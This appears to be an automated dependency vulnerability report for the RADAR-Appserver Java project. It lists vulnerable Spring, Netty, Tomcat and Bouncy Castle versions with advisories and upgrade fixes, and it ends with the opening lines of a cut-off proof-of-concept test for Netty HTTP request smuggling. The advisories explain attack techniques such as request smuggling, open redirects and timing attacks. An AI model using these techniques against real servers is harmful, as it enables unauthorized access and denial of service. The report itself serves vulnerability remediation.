Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
Overview
org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.
Affected versions of this package are vulnerable to Incorrect Authorization via the AnnotationsScanner and AnnotatedMethod class. An attacker can gain unauthorized access to sensitive information by exploiting improper resolution of annotations on methods within type hierarchies that use parameterized supertypes with unbounded generics.
Note:
This is only exploitable if security annotations are used on methods in generic superclasses or generic interfaces and the @EnableMethodSecurity feature is enabled.
Remediation
Upgrade org.springframework:spring-core to version 6.2.11 or higher.
References
high severity
new
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.google.firebase:firebase-admin@9.8.0 › io.netty:netty-codec-http@4.2.10.FinalRemediation: Upgrade to com.google.firebase:firebase-admin@9.9.0.
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to HTTP Request Smuggling in the HttpObjectDecoder component. An attacker can manipulate downstream request interpretation by sending specially crafted HTTP/1.0 requests containing both Transfer-Encoding: chunked and Content-Length headers. This can result in unauthorized access, cache poisoning, or bypassing security controls by causing downstream proxies or handlers to misinterpret message boundaries.
Note:
This is only exploitable if the deployment is behind a reverse proxy or load balancer that prioritizes the Content-Length header, the attacker can send HTTP/1.0 requests, and there is no additional HTTP/1.0 stripping layer between the attacker and the application.
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.133.Final, 4.2.13.Final or higher.
References
high severity
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.54.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Improper Authentication in processOCSPRequest(), which is part of the the CLIENT_CERT authentication process. In some "edge cases", an attacker can trigger a soft-fail of OCSP checks when soft-fail is disabled.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.117, 10.1.54, 11.0.21 or higher.
References
high severity
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.53.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to HTTP Request Smuggling in ChunkedInputFilter, when handling HTTP/1.1 requests with invalid chunk extensions. An attacker can interfere with the interpretation of HTTP requests and responses by injecting CRLF sequences and sending the payload to an application using a reverse proxy that allows those sequences.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.116, 10.1.53, 11.0.20 or higher.
References
high severity
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.53.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm which may arise due to improper preservation of the configured cipher preference order. An attacker who can control the ciphers in use and cause an insecure one to be given higher precedence than the configured one, during TLS negotiation, can access sensitive information.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.116, 10.1.53, 11.0.20 or higher.
References
high severity
- Vulnerable module: org.bouncycastle:bcprov-jdk18on
- Introduced through: io.minio:minio@8.6.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › io.minio:minio@8.6.0 › org.bouncycastle:bcprov-jdk18on@1.81Remediation: Upgrade to io.minio:minio@9.0.1.
Overview
Affected versions of this package are vulnerable to Timing Attack through the sample and sample_matrix functions in FrodoEngine.java. An attacker can recover information about the sampled noise values by observing how long Frodo key generation or encapsulation takes when it processes attacker-influenced inputs. The variable-time comparison and sign handling in the error sampler leak the distribution of the generated samples, weakening the secrecy of the private Frodo noise and enabling key-recovery attacks against affected deployments.
Remediation
Upgrade org.bouncycastle:bcprov-jdk18on to version 1.84 or higher.
References
high severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Incomplete Cleanup via multipart request handling in WebFlux. An attacker can exhaust disk space by sending multipart requests with large parts that trigger creation of temporary files, which under certain conditions are not deleted after the request completes, leading to accumulation of temp files and denial of service.
Remediation
Upgrade org.springframework:spring-web to version 6.2.18, 7.0.7 or higher.
References
high severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Open Redirect when UriComponentsBuilder parses an externally provided URL, and the application subsequently uses that URL. If it contains hierarchical components such as path, query, and fragment it may evade validation.
Remediation
Upgrade org.springframework:spring-web to version 5.3.32, 6.0.17, 6.1.4 or higher.
References
high severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Open Redirect when using UriComponentsBuilder to parse an externally provided URL and perform validation checks on the host of the parsed URL.
Note: This is the same as CVE-2024-22243, but with different input.
Remediation
Upgrade org.springframework:spring-web to version 5.3.33, 6.0.18, 6.1.5 or higher.
References
medium severity
new
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.google.firebase:firebase-admin@9.8.0 › io.netty:netty-codec-http@4.2.10.FinalRemediation: Upgrade to com.google.firebase:firebase-admin@9.9.0.
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to HTTP Request Smuggling via the getChunkSize function. An attacker can inject unauthorized HTTP requests by crafting a chunk size value that causes integer overflow, allowing additional requests to be smuggled within the body of a chunked HTTP message.
PoC
@Test
public void test() {
String requestStr = "POST / HTTP/1.1\r\n" +
